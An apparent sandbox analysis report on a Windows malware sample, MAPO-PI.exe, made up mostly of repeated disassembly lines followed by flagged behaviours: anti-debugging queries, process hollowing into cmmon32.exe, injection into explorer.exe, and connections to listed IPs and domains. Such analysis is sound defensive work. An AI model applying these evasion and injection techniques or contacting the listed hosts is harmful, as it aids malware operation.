          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01954496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019514FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01916C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018B746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01917794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01917794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01917794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0196070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01894F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01894F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018AFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0192FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01960EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_019146A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01968ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018D8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018C8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018CA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_01951608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0189E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0194FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0195AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018A766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_018BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D38CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C9A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CFC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D3740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C9BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D18DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C92581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D13D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C87D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D38D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C6AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CEA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D38ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D1FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CFFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C98E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C6E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D1FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C78794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0040ACC0 LdrLoadDll,
          Source: C:\Users\user\Desktop\MAPO-PI.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 159.65.10.143 80
          Source: C:\Windows\explorer.exeDomain query: www.lifeinformpodcast.com
          Source: C:\Windows\explorer.exeDomain query: www.transforming-leadership.com
          Source: C:\Windows\explorer.exeDomain query: www.diofis.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 109.232.217.55 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\MAPO-PI.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 8B0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\MAPO-PI.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\MAPO-PI.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\MAPO-PI.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)Show sources
